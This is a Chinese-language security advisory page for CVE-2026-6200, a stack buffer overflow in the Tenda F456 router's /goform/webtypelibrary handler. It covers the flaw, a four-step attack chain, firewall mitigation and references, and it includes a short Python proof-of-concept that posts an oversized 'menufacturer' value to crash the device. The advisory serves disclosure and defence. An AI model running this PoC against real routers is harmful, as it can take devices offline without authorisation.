CVE-2026-6200 CVSS 8.8 高危

CVE-2026-6200 Tenda F456 栈缓冲区溢出漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6200

漏洞类型

栈缓冲区溢出 (Stack-based Buffer Overflow)

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Tenda F456

漏洞概述

Tenda F456 路由器 1.0.0.5 版本被发现存在严重的栈缓冲区溢出漏洞。问题出在 /goform/webtypelibrary 接口的 formwebtypelibrary 函数中，由于未对传入的 menufacturer 参数进行严格的边界检查，导致远程攻击者可通过发送特制的恶意数据包触发溢出。成功利用该漏洞可能导致设备崩溃、拒绝服务，或在设备上执行任意代码，严重影响系统安全。

技术细节

该漏洞属于典型的栈缓冲区溢出。在 Tenda F456 固件中，/goform/webtypelibrary 接口负责处理特定表单请求。后台函数 formwebtypelibrary 在接收 HTTP POST 请求中的 menufacturer 参数时，直接使用了不安全的拷贝函数（如 strcpy）将用户输入的数据复制到栈上的局部变量中，且未验证输入数据的长度。由于栈空间有限，当传入超长字符串时，多余的数据会覆盖栈上的返回地址或其他关键寄存器。攻击者通过精心构造 payload，覆盖返回地址指向 shellcode 或 ROP 链，即可控制程序执行流，获得设备的 root 权限。由于 CVSS 向量显示 PR:L，攻击通常需要低权限账户或特定网络条件，但无需用户交互。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别目标设备为 Tenda F456，并确认固件版本为 1.0.0.5。

STEP 2

2. 构造恶意数据

攻击者编写脚本，构造包含超长字符串的 POST 请求，该字符串被放置在 menufacturer 参数中。

STEP 3

3. 发送攻击请求

攻击者将恶意请求发送至目标设备的 /goform/webtypelibrary 接口。

STEP 4

4. 触发溢出与执行

由于程序未检查长度，栈空间被覆盖，导致返回地址被重写，程序流程跳转至恶意代码执行或崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_tenda_f456(target_ip):
    """
    PoC for CVE-2026-6200 Stack-based Buffer Overflow in Tenda F456
    Target: /goform/webtypelibrary
    Vulnerable Parameter: menufacturer
    """
    url = f"http://{target_ip}/goform/webtypelibrary"
    # Creating a large payload to trigger the stack overflow
    # Pattern 'A' * 1000 is used to demonstrate the crash
    payload = b"A" * 1000
    
    data = {
        "menufacturer": payload
    }
    
    try:
        print(f"[+] Sending payload to {url}...")
        response = requests.post(url, data=data, timeout=5)
        print(f"[+] Request sent. Status Code: {response.status_code}")
        print("[+] Check if the device has crashed or responded unexpectedly.")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed or device crashed: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit_tenda_f456(target)

影响范围

Tenda F456 1.0.0.5

防御指南

临时缓解措施

如果无法立即升级固件，建议在防火墙中封禁外部对路由器Web管理端口（通常为80或443）的访问，仅允许可信的内网IP进行管理操作，并关闭不必要的远程管理功能以降低被攻击风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6200
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6200
3 Details https://www.cvedetails.com/cve/CVE-2026-6200/
4 VulDB https://vuldb.com/cve/CVE-2026-6200
5 Link https://github.com/Litengzheng/vuldb_new/blob/main/F456/vul_117/README.md
6 Link https://vuldb.com/submit/797472
7 Link https://vuldb.com/vuln/357122
8 Link https://vuldb.com/vuln/357122/cti
9 Link https://www.tenda.com.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表